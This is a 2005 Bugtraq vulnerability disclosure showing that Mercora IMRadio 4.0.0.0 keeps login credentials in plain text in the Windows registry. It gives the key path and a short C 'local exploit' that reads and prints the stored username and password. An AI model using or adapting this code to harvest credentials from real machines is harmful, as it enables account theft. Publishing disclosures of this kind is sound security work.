Mercora IMRadio 4.0.0.0 Discloses Passwords to Local Users

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Mercora IMRadio 4.0.0.0 Discloses Passwords to Local Users
From: kozan@xxxxxxxxxxxxxxxxxx
Date: 23 Aug 2005 13:20:16 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

/*================================================================

Mercora IMRadio 4.0.0.0 password disclosure local exploit by Kozan

Discovered & Coded by: Kozan
Credits to ATmaCA
Web: www.spyinstructors.com
Mail: kozan@xxxxxxxxxxxxxxxxxx

=====[ Application ]==============================================

Application: Mercora IMRadio 4.0.0.0 (and probably prior versions)
Vendor: www.mercora.com

=====[ Introduction ]=============================================

Search, listen, and record any music. With over 2.5 million unique
tracks, Mercora is a legal music radio network powered by people,
DJs, and artists just like you. Mercora combines Internet streaming,
country-specific copyright compliance, and social networking
technologies to create the next generation of digital music.
Version 4.0 supports friends and family listening, a vastly
simplified interface, customized listening, and live music search.

=====[ Bug ]======================================================

Mercora IMRadio 4.0.0.0 stores username and passwords in the Windows
Registry in plain text. A local user can read the values.

HKEY_CURRENT_USER\Software\Mercora\MercoraClient\Profiles
Auto.Username = Mercora IMRadio Username
Auto.Password = Mercora IMRadio Password

=====[ Vendor Confirmed ]=========================================

No

=====[ Fix ]======================================================

There is no solution at the time of this entry.

================================================================*/

#include <stdio.h>
#include <windows.h>
#define BUF 100

int main()
{
       HKEY hKey;
       char Username[BUF], Password[BUF];
       DWORD dwBUFLEN = BUF;
       LONG lRet;

       if( RegOpenKeyEx(HKEY_CURRENT_USER,
                                       
"Software\\Mercora\\MercoraClient\\Profiles",
                                       0,
                                       KEY_QUERY_VALUE,
                                       &hKey
                                       ) == ERROR_SUCCESS )
       {
               lRet = RegQueryValueEx(hKey, "Auto.Password", NULL, NULL, 
(LPBYTE)Password, &dwBUFLEN);
               if (lRet != ERROR_SUCCESS || dwBUFLEN > BUF) 
strcpy(Password,"Not Found!");

               lRet = RegQueryValueEx(hKey, "Auto.Username", NULL, NULL, 
(LPBYTE)Username, &dwBUFLEN);
               if (lRet != ERROR_SUCCESS || dwBUFLEN > BUF) 
strcpy(Username,"Not Found!");

               RegCloseKey(hKey);

               fprintf(stdout, "Mercora IMRadio 4.0.0.0 password disclosure 
local exploit by Kozan\n");
               fprintf(stdout, "Credits to ATmaCA\n");
               fprintf(stdout, "www.spyinstructors.com \n");
               fprintf(stdout, "kozan@xxxxxxxxxxxxxxxxxx\n\n");
               fprintf(stdout, "Username :\t%s\n",Username);
               fprintf(stdout, "Password :\t%s\n",Password);
       }
       else
       {
               fprintf(stderr, "Mercora IMRadio 4.0.0.0 is not installed on 
your system!\n");
       }

       return 0;
}

Follow-Ups:
- Re: Mercora IMRadio 4.0.0.0 Discloses Passwords to Local Users
  - From: 3APA3A

Prev by Date: Server crash in Ventrilo 2.3.0
Next by Date: [USN-172-1] lm-sensors vulnerability
Previous by thread: Server crash in Ventrilo 2.3.0
Next by thread: Re: Mercora IMRadio 4.0.0.0 Discloses Passwords to Local Users
Index(es):
- Date
- Thread